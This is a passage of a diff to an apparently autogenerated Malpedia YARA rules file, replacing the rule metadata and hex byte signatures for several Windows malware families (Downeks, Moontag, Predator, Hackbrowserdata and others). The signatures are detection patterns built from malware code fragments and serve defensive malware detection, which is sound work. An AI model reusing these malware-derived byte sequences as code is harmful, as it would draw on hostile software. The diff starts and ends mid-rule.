 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 50 51 ffb5dcfbffff 8d8d74fbffff e8???????? 8d8590fbffff }
-		$sequence_1 = { 85c0 7418 8b858cfbffff 85c0 7407 50 }
-		$sequence_2 = { 8b0c8550704100 8a043b 03ce 8b75dc }
-		$sequence_3 = { eb6f 8b07 8d1c85446d4100 8b33 85f6 }
-		$sequence_4 = { e8???????? be01000000 8b95d8fbffff 83fa08 7235 }
-		$sequence_5 = { c7404860604100 8b4508 6689486c 8b4508 66898872010000 8d4dff 8b4508 }
-		$sequence_6 = { c7404860604100 8b4508 6689486c 8b4508 66898872010000 }
-		$sequence_7 = { 33c0 c744246000000000 c744246407000000 6689442450 }
-		$sequence_8 = { 8d85a8fbffff 6a01 0f4385a8fbffff 68???????? }
-		$sequence_9 = { c1fa06 8934b8 8bc7 83e03f 6bc838 8b049550704100 8b440818 }
+		$sequence_0 = { 56 ff15???????? 83c40c 3bc6 }
+		$sequence_1 = { 6810270000 ff15???????? be06000000 e8???????? 85c0 7401 4e }
+		$sequence_2 = { 68???????? 52 ffd7 ffd0 }
+		$sequence_3 = { 6a00 ff15???????? 8bf0 ff15???????? 50 68???????? 68???????? }
+		$sequence_4 = { 8d041e 50 57 6a08 51 ff15???????? 8bf8 }
+		$sequence_5 = { 6804010000 6a08 8b15???????? 52 ff15???????? }
+		$sequence_6 = { 8b0d???????? 8b15???????? 6a01 51 68???????? 52 }
+		$sequence_7 = { c20400 50 a1???????? 6a00 50 }
+		$sequence_8 = { e8???????? 85c0 7402 eb14 c745f000000000 68e0930400 ff15???????? }
+		$sequence_9 = { 8d4c2400 56 51 6a00 }
+		$sequence_10 = { 50 a3???????? ffd6 a3???????? }
+		$sequence_11 = { 8bf1 8b4604 85c0 7407 50 ff15???????? 8b36 }
+		$sequence_12 = { ff15???????? ffd0 85c0 7508 }
+		$sequence_13 = { 8b0d???????? 52 50 57 68???????? }
+		$sequence_14 = { 68???????? 6800080000 8d85fcefffff 50 }
+		$sequence_15 = { 68???????? 50 ffd6 6a00 6a00 6a00 }
+		$sequence_16 = { 8d442404 6a00 8bf1 50 c744240c00000000 ff15???????? }
+		$sequence_17 = { 52 ff15???????? 8b0d???????? 8bf0 8b5c241c 8d041e }
+		$sequence_18 = { 50 68???????? 68???????? 8985f0fdffff 8d85f4fdffff 6804010000 50 }
+		$sequence_19 = { 03cf 880431 fec3 ebe6 }
+		$sequence_20 = { 52 e8???????? 83c408 33c0 8b4df0 64890d00000000 }
+		$sequence_21 = { 81e1ffff0000 81e1ffff0000 81e1ff000000 81e1ff000000 }
+		$sequence_22 = { 5d 83c8ff 5b c20c00 03f7 }
+		$sequence_23 = { 8b8dd8edffff 51 8d95f4edffff 52 }
+		$sequence_24 = { 81e2ffff0000 81e2ffff0000 c1ea08 81e2ff000000 }
+		$sequence_25 = { e8???????? 8be8 8b442410 50 e8???????? }
+		$sequence_26 = { 6888130000 ff15???????? c745f000000000 c745f400000000 }
+		$sequence_27 = { 25ffff0000 0fb7c8 c1e908 81e1ff000000 0fb6d1 52 }
+		$sequence_28 = { ff15???????? 83c414 8d95f4fdffff 52 ff15???????? }
+		$sequence_29 = { 56 51 56 6a01 }
+		$sequence_30 = { ff15???????? ba00080000 2bd0 52 8d85fcefffff }
+		$sequence_31 = { a1???????? 50 68???????? 8b0d???????? 51 ff15???????? ffd0 }
+		$sequence_32 = { 0305???????? 50 ff15???????? a1???????? }
+		$sequence_33 = { ffd6 ffd0 68???????? a3???????? }
+		$sequence_34 = { 68???????? 51 ffd3 ffd0 }
+		$sequence_35 = { 5f 5b 5d c3 b81c000000 e8???????? 89e0 }
+		$sequence_36 = { 29d6 0faff0 31d2 f7f6 }
+		$sequence_37 = { 5f 5d c3 89e0 c70010270000 }
+		$sequence_38 = { 68???????? 53 a3???????? ffd6 68???????? a3???????? ffd7 }
+		$sequence_39 = { 29d6 01f0 a3???????? e9???????? }
+		$sequence_40 = { 690006000000 0306 8b4dcc 8b09 }
+		$sequence_41 = { a3???????? ffd7 8bd8 68???????? }
+		$sequence_42 = { bf04010000 57 6a08 ff35???????? ff15???????? }
+		$sequence_43 = { 6689fb 0fb7fb c1ef08 81e7ff000000 }
+		$sequence_44 = { 8908 8b00 8b5004 8b35???????? }
+		$sequence_45 = { 56 57 8b3d???????? 68???????? ffd7 8b35???????? 68???????? }
+		$sequence_46 = { 8908 8b15???????? 89d6 81c609000000 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 303100
 }
-rule MALPEDIA_Win_Downeks_Auto : FILE
+rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1af7457-a967-5afd-afe7-3e5e1a0a9026"
+		id = "e6b5074a-ee80-5f17-8d10-821d108c299b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.downeks_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pseudo_manuscrypt_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "2a5314b1c911549ae340f3f5ef76252cb23ca35ba95d30c0718999dad54c01d3"
+		logic_hash = "c6f7c325b24974deecc4b35c3043dbcf14d37411aa98d6d4fbada988adbed753"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117075,32 +117101,32 @@ rule MALPEDIA_Win_Downeks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 817d08c8000000 53 56 8bf0 8b9e38040000 57 }
-		$sequence_1 = { c3 b8042c0804 5d c3 b8ec250804 5d c3 }
-		$sequence_2 = { c20c00 8bc1 ddd8 894dd8 81e1ffffff7f 8955cc 894dd0 }
-		$sequence_3 = { 8b7d08 8bc7 c1f805 8bf7 83e61f c1e606 033485e0ffb405 }
-		$sequence_4 = { 8bbd48ffffff 039d68ffffff c1ef03 33f7 03f3 03b544ffffff 897584 }
-		$sequence_5 = { b820000000 8bce e8???????? 33c0 5f 5e 5b }
-		$sequence_6 = { 8d5df0 8b5508 893a 393b 0f8598000000 56 e8???????? }
-		$sequence_7 = { c746140f000000 c7461000000000 6839ac0804 8bce c60600 e8???????? eb7a }
-		$sequence_8 = { c78550ffffff01000000 89b7a0040000 394d98 7c12 7f08 8b5594 3b558c }
-		$sequence_9 = { 6a3f 85c0 7403 40 eb09 8b55e8 8b8298000000 }
+		$sequence_0 = { 8b45ec 8d044502000000 a3???????? 8b4dfc 33cd e8???????? 8be5 }
+		$sequence_1 = { 8b8594feffff 8d8df0feffff 8b9ddcfeffff 8bbdd8feffff 99 03c3 898de4feffff }
+		$sequence_2 = { 8bf8 ff15???????? 5e 8bc7 5f 5b 8be5 }
+		$sequence_3 = { 50 e8???????? 83c404 c70700000000 8b07 c7470800000000 }
+		$sequence_4 = { eb6b 8d45a0 50 8d4d8c e8???????? 8b4dc0 85c9 }
+		$sequence_5 = { 8bec 83ec14 57 8d45ec c745ec14000000 50 8bf9 }
+		$sequence_6 = { 7407 b801000000 5e c3 8b86c0000000 85c0 7411 }
+		$sequence_7 = { 390d???????? 0f94c0 c3 a1???????? c3 8bff 55 }
+		$sequence_8 = { ff15???????? 83c40c 8d8d1cf7ffff 51 6802000080 ff15???????? 5f }
+		$sequence_9 = { 56 57 8bf9 b9???????? e8???????? 8d45ac 50 }
 
 	condition:
-		7 of them and filesize < 1318912
+		7 of them and filesize < 753664
 }
-rule MALPEDIA_Win_Http_Troy_Auto : FILE
+rule MALPEDIA_Win_Moontag_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "95fd4364-0c49-5029-9362-b053f1981ad0"
+		id = "cd77d4b0-0d98-5f5e-a57c-397ee34a65ee"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.http_troy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moontag"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moontag_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "f51f643b968f327406be07b32339103de989865626147227f095521c9d0409e5"
+		logic_hash = "8b060f50d5b5253ee18a9ffafa5845b2d3ee94dd99bd63bfd885c3444be1c8ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117114,32 +117140,38 @@ rule MALPEDIA_Win_Http_Troy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 894c241d 8d443bfb 3be8 66894c2421 8bf5 c644241c00 }
-		$sequence_1 = { 895e70 899e90000000 895e74 750a 5e b800000100 }
-		$sequence_2 = { 8d442414 50 8d4c241c 51 6a00 6a00 6a00 }
-		$sequence_3 = { 33f1 33f0 03f3 8dbc37a9cfde4b 8bf7 c1e70b 8b5c2430 }
-		$sequence_4 = { e8???????? 83c418 ff7508 e8???????? 83c404 833d????????00 752c }
-		$sequence_5 = { 0bd3 4f 8956fc 75da }
-		$sequence_6 = { e8???????? 59 83e6fb e9???????? 84c3 0f84d8000000 f6451008 }
-		$sequence_7 = { 6802000080 c744242800000000 ff15???????? 8b542418 8d442408 }
-		$sequence_8 = { 8d8c2478010000 51 ffd6 b801000000 8b8c2414110000 e8???????? 5f }
-		$sequence_9 = { 6a00 68???????? e8???????? 8b54241c 83c404 50 52 }
+		$sequence_0 = { 4833c4 4889842430040000 488bd9 498d7b10 e8???????? 48897c2428 }
+		$sequence_1 = { 4885d2 480f4415???????? 483b15???????? 480f4405???????? 488905???????? c3 4885c9 }
+		$sequence_2 = { 4881ec60010000 488b05???????? 4833c4 48894550 488d4c2440 }
+		$sequence_3 = { 4d8be6 482bea 4d2be7 4d3bf7 7343 }
+		$sequence_4 = { 48c74424680f000000 c644245000 483bd9 0f82c0010000 482bd9 49c7c0ffffffff 493bd8 }
+		$sequence_5 = { 4883c420 5f c3 488bca e8???????? 488bf8 4885c0 }
+		$sequence_6 = { 488b36 4885f6 758a e9???????? 48837e3800 }
+		$sequence_7 = { c3 48833a00 7508 488b4208 49894008 }
+		$sequence_8 = { 03c1 68???????? 50 ffd3 83c40c 85c0 }
+		$sequence_9 = { 033d???????? 837d8400 0f4e3d???????? 83c734 }
+		$sequence_10 = { 03c1 3bf8 0f42f8 33c9 8bc7 83c001 56 }
+		$sequence_11 = { 014e08 b801000000 5f 5e 5b 8b4c2458 }
+		$sequence_12 = { 03c1 50 898570ecffff 8d8574ecffff }
+		$sequence_13 = { 03c2 3bf8 0f838f010000 8b0d???????? }
+		$sequence_14 = { 03c1 8b0d???????? a3???????? 3bc1 }
+		$sequence_15 = { 03421c 03c6 3bc8 760c }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 203776
 }
-rule MALPEDIA_Win_Unidentified_080_Auto : FILE
+rule MALPEDIA_Win_No_Justice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "167c06b1-3a4c-5ce4-bead-27b24b52c04c"
+		id = "5b7b9773-a26f-59ba-b88a-0b2ca96e9a3c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_080_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.no_justice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.no_justice_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "1ce14bfb96c0d551ff9abc4441491b6d6b29b9deb460d6ae62dbbcd58745f42a"
+		logic_hash = "8d1e9903aebd9a1a139d570c6e8c7d10c9b765f1e0f83bd5a67cde88d712e8e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117153,34 +117185,34 @@ rule MALPEDIA_Win_Unidentified_080_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85f6 7431 8d460d 50 e8???????? 83c404 85c0 }
-		$sequence_1 = { ff15???????? 68e8030000 ff15???????? 8b85e0fdffff 40 8985e0fdffff 83f80a }
-		$sequence_2 = { 8b5004 8bce c745ec88310210 ffd2 33c0 }
-		$sequence_3 = { 899d8cfdffff 898504fdffff 899d88fdffff 899d90fdffff 899d94fdffff }
-		$sequence_4 = { 57 56 6a01 50 ff15???????? 85c0 }
-		$sequence_5 = { 741d 8b5508 8bf3 e8???????? 83c404 5f c7830050000000000000 }
-		$sequence_6 = { 767d 03c7 3b44243c 763f 8b44243c 0500400000 50 }
-		$sequence_7 = { 894c2414 8b4760 8b5f6c 8b742414 }
-		$sequence_8 = { 40 3bc7 72f6 eb2b 8d5001 8bcf 2bca }
-		$sequence_9 = { 8b5c2414 83c3f4 81fb???????? 7414 53 ff15???????? 85c0 }
+		$sequence_0 = { 7720 0fb680ac5c4000 ff2485985c4000 33c0 40 5d }
+		$sequence_1 = { 8a0a 884c382e 8b45bc 8b048570be4100 804c382d04 }
+		$sequence_2 = { 0f84e8000000 8b04952c6b4100 898588f8ffff 85c0 0f84ad000000 3bc3 0f84cb000000 }
+		$sequence_3 = { e8???????? c9 c3 c705????????08b14100 b001 }
+		$sequence_4 = { c1e002 50 8b85a8f8ffff 0fb70485946a4100 8d048590614100 50 8d8590faffff }
+		$sequence_5 = { 8b148d70be4100 0355b0 8a0c03 03d3 43 }
+		$sequence_6 = { c745e003000000 c745e4508e4100 e9???????? 83e80f }
+		$sequence_7 = { 57 e8???????? 59 59 e9???????? 8b049570be4100 f644082840 }
+		$sequence_8 = { f7d0 a801 74a5 8b55ec 33f6 8b049570be4100 }
+		$sequence_9 = { 0f8414020000 eb4f 0fb602 0fbe8860b74100 41 894db4 3bcf }
 
 	condition:
-		7 of them and filesize < 392192
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Dadjoke_Auto : FILE
+rule MALPEDIA_Win_Bluelight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea7282f2-8a4c-5601-bbd1-b76f58e52bc1"
+		id = "6e926d75-3ab2-5756-a7ce-3e5a6c0d0aa0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dadjoke_auto.yar#L1-L228"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bluelight_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9c73a5622c3f32fd5cf8900e0843a3bbc9bcae66e0aa7ecc5e1cf55e72cc18b5"
+		logic_hash = "41a5ac3b75dc9289131b8472b69bdf4cdf3bf64ebeaeb2e76e9bbd4dca7df902"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117192,45 +117224,32 @@ rule MALPEDIA_Win_Dadjoke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 57 6800081000 6a00 }
-		$sequence_1 = { 52 8b4508 0528020000 50 8b0d???????? }
-		$sequence_2 = { 83ec40 56 57 8d45e0 50 e8???????? }
-		$sequence_3 = { 8b45e8 50 e8???????? 83c404 898578ffffff }
-		$sequence_4 = { e8???????? 83c408 8945f8 8b4d08 8b5110 52 8b45f8 }
-		$sequence_5 = { 8845f4 8345d801 807df400 75ee 8b4dd8 }
-		$sequence_6 = { 8b4df4 8dbc0d2cffffff b910000000 8d75ac f3a5 8b55f4 83c240 }
-		$sequence_7 = { 83c414 8b4df4 64890d00000000 8be5 5d c20800 }
-		$sequence_8 = { 33c9 84c0 0f94c1 8bc1 c3 a1???????? }
-		$sequence_9 = { 5e c3 8bff 55 8bec 83ec10 33c0 }
-		$sequence_10 = { e8???????? c3 6a04 e8???????? 59 c3 6a0c }
-		$sequence_11 = { ff15???????? 85c0 7417 b920000000 }
-		$sequence_12 = { 5d c3 6a04 8d458c c7458c80330000 50 }
-		$sequence_13 = { 84c0 75ef b82f000000 8d55f4 }
-		$sequence_14 = { 6a07 6a00 ff15???????? 85c0 0f881f010000 }
-		$sequence_15 = { 83fe04 7ce7 8d45f4 c645f800 }
-		$sequence_16 = { 7508 807e015a 7502 ffd6 6800400000 }
-		$sequence_17 = { 8b1d???????? 51 e8???????? 8bf0 83c404 85f6 }
-		$sequence_18 = { 0f85b5000000 50 ff15???????? 8d85e4faffff 50 }
-		$sequence_19 = { d9c9 d9f1 833d????????00 0f85cc140000 }
-		$sequence_20 = { 6804010000 85c0 57 6a00 }
-		$sequence_21 = { 55 8bec 8b4d0c 85c9 7454 8b5508 8b4514 }
-		$sequence_22 = { 83e908 8d7608 660fd60f 8d7f08 8b048db47c7300 ffe0 }
+		$sequence_0 = { ff771c ff15???????? ff771c 8b7714 ff15???????? 5f 8bc6 }
+		$sequence_1 = { 884dc7 8955d0 81faa7000000 0f87a8410000 ff249526044300 6b4b0428 6a04 }
+		$sequence_2 = { 85db 740f ff7760 53 ff7764 e8???????? 83c40c }
+		$sequence_3 = { eb0c 8b4508 8907 c7450800000000 8b4518 894710 8b4520 }
+		$sequence_4 = { f64605c0 7415 8d442420 68???????? 50 e8???????? ff44241c }
+		$sequence_5 = { e8???????? 8d4d8c 894314 e8???????? 8d4d9c e8???????? 8d4d94 }
+		$sequence_6 = { e8???????? b8???????? e9???????? 8d8d60feffff e9???????? 8d4da8 e9???????? }
+		$sequence_7 = { ff761c 50 e8???????? 83c410 8d4510 50 ff750c }
+		$sequence_8 = { 8b45d4 3bde 7507 8bc8 e8???????? 8a4d9f 33db }
+		$sequence_9 = { ff7304 8b4d0c ff73ec 6a2d 5a e8???????? 8943ec }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 2191360
 }
-rule MALPEDIA_Win_Khrat_Auto : FILE
+rule MALPEDIA_Win_Vflooder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d98fbdf3-9fe4-57f4-bc2e-25361c02b6b3"
+		id = "6da3af77-bf0c-5d0d-ad9f-8f035b957625"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.khrat_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vflooder_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "f897e4b10c9d307944a08dbe843650aba78831f11c2fc81a4d9a80e6f47607a3"
+		logic_hash = "14b49a20a71548a980ead5d4f60898b254e57c1fbb273dc458944348b271a849"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117244,32 +117263,32 @@ rule MALPEDIA_Win_Khrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7415 ff35???????? e8???????? c705????????00000000 833d????????ff 7415 ff35???????? }
-		$sequence_1 = { 0fb64306 a3???????? 8d7307 56 68???????? e8???????? 6a00 }
-		$sequence_2 = { e8???????? eb0f 807b06ff 7509 8b4b07 51 e8???????? }
-		$sequence_3 = { 50 8d8500fcffff 50 6801000080 e8???????? }
-		$sequence_4 = { c6430500 c6430600 894307 8d7b0b }
-		$sequence_5 = { 66c746326500 66c746347700 66c746363a00 66c746380000 8db500feffff }
-		$sequence_6 = { 8d8500fcffff 50 e8???????? 6a00 51 8d8500fcffff 50 }
-		$sequence_7 = { e8???????? 0bc0 0f84da000000 d1e0 8985fcfbffff ffb5fcfbffff }
-		$sequence_8 = { c9 c3 55 8bec 81c490fbffff }
-		$sequence_9 = { c9 c3 55 8bec 81c4f8fbffff 8d9d00fcffff }
+		$sequence_0 = { 9c ff742404 8f4500 9c 60 }
+		$sequence_1 = { b02e f5 f2ae e8???????? }
+		$sequence_2 = { 0000 43 7265 61 }
+		$sequence_3 = { e8???????? 0000 43 7265 }
+		$sequence_4 = { e8???????? 0000 43 7265 61 7465 }
+		$sequence_5 = { 9c ff742404 8f4500 9c }
+		$sequence_6 = { e8???????? 0000 43 7265 61 }
+		$sequence_7 = { f5 83ef04 f5 ff37 }
+		$sequence_8 = { 9c f2ae 9c 9c }
+		$sequence_9 = { 9c 60 9c 9c 8d642430 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 860160
 }
-rule MALPEDIA_Win_Blackpos_Auto : FILE
+rule MALPEDIA_Win_Predator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3030926-9034-5a42-987b-de9e78e9dde5"
+		id = "0d522826-628f-52a1-a5d4-de369cb17f76"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackpos_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.predator_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "c4a32b4f82fccb65e36ace8eee5711333479f2ae865afb2d6f3c995c606d80a9"
+		logic_hash = "226e996f5790709cd601960ccd073047c3c37841c157b9e9145c03fdc70dc2d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117283,32 +117302,32 @@ rule MALPEDIA_Win_Blackpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8d85d0fcffff 50 56 ff15???????? }
-		$sequence_1 = { 837e1400 0f8e94010000 83a5f8fffdff00 8b7e08 83661400 }
-		$sequence_2 = { 8d7de0 f3a5 a4 be00020000 }
-		$sequence_3 = { 8365bc00 8365c000 8945b4 8d45b4 50 }
-		$sequence_4 = { 53 50 889db8fcffff e8???????? 57 68???????? }
-		$sequence_5 = { f7f9 8b4dfc 5f 5e 5b 8bc2 }
-		$sequence_6 = { 8a843dfefffdff 3ac1 7211 3c3a }
-		$sequence_7 = { 803e00 7522 8d041f 6a01 8d8405e5fbffff 50 56 }
-		$sequence_8 = { 8bc8 83e01f c1f905 c1e006 03048d60c45800 eb02 8bc2 }
-		$sequence_9 = { 899dbcfaffff c785c0faffffa0bb0d00 c785c4faffff90854100 ffd7 8d85c4faffff 50 }
+		$sequence_0 = { 56 8bf1 8d4dfd 57 6a0a }
+		$sequence_1 = { 395dec 7508 83c8ff e9???????? ff75ec e8???????? }
+		$sequence_2 = { 50 8bcf e8???????? e9???????? 0f2805???????? }
+		$sequence_3 = { 7316 8a440dc7 32c2 88440dc7 41 }
+		$sequence_4 = { 83c8ff e9???????? ff75ec e8???????? 59 8bf0 }
+		$sequence_5 = { 0fa2 8906 895e04 894e08 89560c 834dfcff 8b4df4 }
+		$sequence_6 = { 8b00 57 03c2 8bce 50 e8???????? 5f }
+		$sequence_7 = { 8906 895e04 894e08 89560c 834dfcff 8b4df4 }
+		$sequence_8 = { 395dec 7508 83c8ff e9???????? ff75ec e8???????? 59 }
+		$sequence_9 = { ff750c 8bf1 8d4dfd ff7508 }
 
 	condition:
-		7 of them and filesize < 3293184
+		7 of them and filesize < 2211840
 }
-rule MALPEDIA_Win_Cova_Auto : FILE
+rule MALPEDIA_Win_Hackbrowserdata_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d9a7c58b-e153-5509-9dd6-42fb3c64fb6e"
+		id = "fcd73865-5a53-59f1-9e25-a98b05a9abde"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cova_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hackbrowserdata_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6df5413ed9281b7c21331e877b1103faf7f6d9e2e13d53e94329d8c943fa063c"
+		logic_hash = "3594c5bb7e78e08e9a84a6093ffe67652863ced1d7b7424d638f7eb8af56002c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117322,34 +117341,34 @@ rule MALPEDIA_Win_Cova_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 813bc8000000 7577 488d4d88 ff9598000000 488d4d80 8bf0 b81f85eb51 }
-		$sequence_1 = { 4c8d8d70120000 4c8d8560010000 4889542430 488d95e0000000 }
-		$sequence_2 = { 488d442440 4889442428 488d0518a30000 4889442420 4c8b4c2450 4c8b442458 }
-		$sequence_3 = { 488d8d00150000 ff55b0 448d4e08 4c8d442470 8d1400 488d8d00150000 ff5550 }
-		$sequence_4 = { 41b806000000 488d158e680000 483950f0 740c 488b10 4885d2 }
-		$sequence_5 = { 33d2 33c9 ff5778 488bd8 4885c0 741f ba20bf0200 }
-		$sequence_6 = { 57 4883ec20 488d1ddf5e0000 bf0a000000 }
-		$sequence_7 = { 7d08 8d4a30 418808 eb06 }
-		$sequence_8 = { 4885c9 741c f0ff09 7517 488d05bf830000 }
-		$sequence_9 = { ba20bf0200 488bc8 ff5720 3d80000000 742a }
+		$sequence_0 = { ffc1 4d89ea 4d89fc 4989fd 4d89e7 41394c2428 0f8e0dfaffff }
+		$sequence_1 = { f20f1005???????? 31db 49c7c0ffffffff eb3d 48890437 488bb424a0000000 4883c618 }
+		$sequence_2 = { e8???????? 488b542450 48895008 833d????????00 750a 488b9424d8000000 eb10 }
+		$sequence_3 = { e8???????? e9???????? 488b1d???????? 4881c368960000 488b442478 488b4c2448 e8???????? }
+		$sequence_4 = { ffd3 833d????????00 7507 488b742408 eb15 e8???????? 498903 }
+		$sequence_5 = { e9???????? 488d4f54 4889ca 0fb619 ffcb 8819 480fbe0a }
+		$sequence_6 = { f20f59d8 f20f581d???????? f20f59d8 f20f581d???????? f20f59d8 f20f581d???????? f20f59d9 }
+		$sequence_7 = { ffc1 39d1 7d5d 4889f7 488b7640 4c63c1 4a8d34c6 }
+		$sequence_8 = { eb13 4883c420 5d c3 48bfffffffffffff0300 4989da 4585c0 }
+		$sequence_9 = { e8???????? 498913 48895018 488b942480000000 488b5c2470 4889f9 4c89c7 }
 
 	condition:
-		7 of them and filesize < 123904
+		7 of them and filesize < 42451968
 }
-rule MALPEDIA_Win_Hyperssl_Auto : FILE
+rule MALPEDIA_Win_Contopee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f22636e-fb9b-5862-8e11-c3c097a8328b"
+		id = "271fdd0d-6160-55c0-9abb-0c6806deb383"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hyperssl_auto.yar#L1-L220"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.contopee_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "373cb8242b6edc99bdda77d7fa35bccbbf94de7d502bb63cf5e16d60e54a0b5d"
+		logic_hash = "0ddd8fa512c666b7cb8e2d0e6704c228e8798333540020ddb32d384a50fcb44c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117361,46 +117380,32 @@ rule MALPEDIA_Win_Hyperssl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 742a 8b4028 03c1 7423 56 57 b9???????? }
-		$sequence_1 = { 40 4f 75f2 5f 5e e9???????? }
-		$sequence_2 = { 0108 8b4830 3308 56 }
